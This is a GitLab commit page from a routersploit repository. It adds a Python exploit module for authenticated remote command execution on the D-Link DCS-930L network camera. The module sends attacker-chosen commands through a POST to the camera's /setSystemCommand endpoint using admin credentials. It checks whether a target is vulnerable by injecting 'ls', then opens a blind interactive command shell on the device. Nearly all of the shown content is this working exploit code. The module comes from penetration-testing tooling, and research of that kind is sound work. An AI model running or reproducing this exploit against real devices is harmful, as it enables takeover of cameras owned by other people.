Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
e6c8a8f3
Commit
e6c8a8f3
authored
Jul 02, 2016
by
Marcin Bury
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Adding D-Link DSC-930L post auth rce exploit.
parent
ff0f1a00
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
74 additions
and
0 deletions
+74
-0
dcs_930l_auth_rce.py
routersploit/modules/exploits/dlink/dcs_930l_auth_rce.py
+74
-0
No files found.
routersploit/modules/exploits/dlink/dcs_930l_auth_rce.py
0 → 100644
View file @
e6c8a8f3
from
routersploit
import
(
exploits
,
print_success
,
print_status
,
print_error
,
http_request
,
mute
,
validators
,
shell
,
)
class
Exploit
(
exploits
.
Exploit
):
"""
Exploit implementation for D-Link DCS-930L Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on the device.
"""
__info__
=
{
'name'
:
'D-Link DCS-930L Auth RCE'
,
'description'
:
'Module exploits D-Link DCS-930L Remote Code Execution vulnerability which allows executing command on the device.'
,
'authors'
:
[
'Nicholas Starke <nick[at]alephvoid.com>'
,
# vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>'
,
# routersploit module
],
'references'
:
[
'https://www.exploit-db.com/exploits/39437/'
,
],
'devices'
:
[
'D-Link DCS-930L'
,
]
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
,
validators
=
validators
.
url
)
port
=
exploits
.
Option
(
80
,
'Target Port'
)
username
=
exploits
.
Option
(
'admin'
,
'Username to log in with'
)
password
=
exploits
.
Option
(
''
,
'Password to log in with'
)
def
run
(
self
):
if
self
.
check
():
print_success
(
"Target is vulnerable"
)
print_status
(
"Invoking command loop..."
)
print_status
(
"It is blind command injection, response is not available"
)
shell
(
self
,
architecture
=
"mipsel"
)
else
:
print_error
(
"Exploit failed - target seems to be not vulnerable"
)
def
execute
(
self
,
cmd
):
url
=
"{}:{}/setSystemCommand"
.
format
(
self
.
target
,
self
.
port
)
headers
=
{
"Content-Type"
:
"application/x-www-form-urlencoded; charset=UTF-8"
}
data
=
{
"ReplySuccessPage"
:
"docmd.htm"
,
"ReplyErrorPage"
:
"docmd.htm"
,
"SystemCommand"
:
cmd
,
"ConfigSystemCommand"
:
"Save"
}
http_request
(
method
=
"POST"
,
url
=
url
,
headers
=
headers
,
data
=
data
,
auth
=
(
self
.
username
,
self
.
password
))
return
""
@mute
def
check
(
self
):
url
=
"{}:{}/setSystemCommand"
.
format
(
self
.
target
,
self
.
port
)
headers
=
{
"Content-Type"
:
"application/x-www-form-urlencoded; charset=UTF-8"
}
data
=
{
"ReplySuccessPage"
:
"docmd.htm"
,
"ReplyErrorPage"
:
"docmd.htm"
,
"SystemCommand"
:
"ls"
,
"ConfigSystemCommand"
:
"Save"
}
response
=
http_request
(
method
=
"POST"
,
url
=
url
,
headers
=
headers
,
data
=
data
,
auth
=
(
self
.
username
,
self
.
password
))
if
response
is
None
:
return
False
# target is not vulnerable
if
response
.
status_code
==
200
and
"ConfigSystemCommand"
in
response
.
text
:
return
True
# target is vulnerable
return
False
# target is not vulnerable
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment